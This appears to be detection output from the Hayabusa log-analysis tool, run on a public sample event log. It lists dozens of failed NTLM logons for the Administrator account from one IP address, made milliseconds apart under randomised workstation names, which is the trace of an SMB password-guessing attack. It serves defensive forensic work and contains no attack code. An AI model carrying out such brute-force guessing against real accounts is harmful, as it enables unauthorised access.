+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMUg8N7apFtUgX9d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U7Cn4n7jQAQaxP6y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urflPvd1vgYYi2ra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pqFtTDD69fNTKROG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: teUZYpNyqJ64Dgcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9kaKSy3DV5fRKvTc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtiZUzpwrnuWIjna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SD9UhsShNJRp251r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5xbL7aO0azgBxfz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xqrUpW8PpI9RAeGk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M80K04eYwfwdzIul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jcWY7cNeCNgJ3Czr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1OA561UrTkFnbEj3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iDnu1G7jmwLoXGLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2v70poTOKPUNZJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhzoOmgTrdvTS27z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pyvmBFGhKFgvzM9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHC0keHW2YsKeP02 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29vkwuFa6njYc86s : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s9687XPVHFiwttdm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AcNGaeTqTydGinJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWRu7ZC1eo1nn0IQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M52CihyrQk9MOfCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBKSOZwS6f9ofXu7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uT1LHJs7kyeMmTtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7FvZhetkdjnZOSpq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0DDC7WfL5T4d01yT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: 
